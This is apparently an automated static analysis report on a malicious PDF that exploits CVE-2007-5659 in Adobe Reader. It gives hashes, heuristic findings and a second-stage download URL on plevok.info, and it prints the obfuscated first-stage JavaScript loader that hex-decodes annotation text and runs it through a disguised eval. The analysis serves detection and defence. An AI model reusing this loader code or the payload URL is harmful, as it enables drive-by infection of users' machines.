Malicious PDF — malware analysis report

Static analysis result for SHA-256 0949bacc65883de8…

Verdict: MALICIOUS
File type: PDF
Size: 17.5 KB
MD5: 5d3aaab8898f933a0328a19363075d4a
SHA-1: 2c92534d6afce6eba8aee1ed88ffe4284f37b1f1
SHA-256: 0949bacc65883de80142170e48a8813ab61014ba53953e96c3897de280341413
Risk score: 366

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.007 JavaScript

This PDF file contains obfuscated JavaScript that exploits CVE-2007-5659, specifically targeting Adobe Reader versions within a certain patch range. The script is designed to download a second-stage payload from the embedded URL http://plevok.info/page/gold.php/n002106201r0010R43329fdcX7da8faa3Y673bad53Z0100f080. The presence of anti-analysis checks and the use of String.fromCharCode for decoding further indicate malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (10)

  • Collab.collectEmailInfo — CVE-2007-5659 [severity: critical; CVE match: exact; rule: CVE_2007_5659]
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action [severity: low; 5 related findings; rule: PDF_JAVASCRIPT]
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) [severity: high; CVE match: likely; rule: PDF_JS_ADOBE_APSB08_13_PATCH_GATE]
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster [severity: critical; rule: PDF_JS_EXPLOIT_CLUSTER]
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper [severity: high; rule: PDF_JS_OBFUSCATED_DROPPER]
    PDF JavaScript shows 4 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF JavaScript shellcode contains an embedded download URL [severity: high; rule: PDF_JS_SHELLCODE_DOWNLOAD_URL]
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream [severity: low; rule: PDF_JS]
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 [severity: critical; rule: CLAMAV_DETECTION]
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Suspicious extracted artifact [severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [severity: info; rule: EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://plevok.info/page/gold.php/n002106201r0010R43329fdcX7da8faa3Y673bad53Z0100f080 (referenced by PDF JavaScript)

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename: javascript_obj0009_000.js
SHA-256: 4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d
Kind: pdf-javascript-stream
Source: PDF /JS object 9 at offset 0x43B8
Size: 469 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Script preview (first 1,000 lines of the extracted script):
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
Filename: legacy_pdfkit_stage_000.js
SHA-256: a7d33fa3c36db1937bb5cac9e1da1780994f19b670179b97a6a72988d3b804da
Kind: deobfuscated-js
Source: z-percent UTF-16BE base-21 decoded JavaScript at offset 0x1AEC
Size: 5358 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Script preview (first 1,000 lines of the extracted script):
... (truncated)
Filename: deobfuscated.js
SHA-256: 1b0d1df312450ad0467563d4f25527acf64ce15b0e747ea1b6e6c4f89ce1c49e
Kind: deobfuscated-js
Source: PDF JavaScript deobfuscation pass
Size: 179303 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
Script preview (first 1,000 lines of the extracted script):
... (truncated)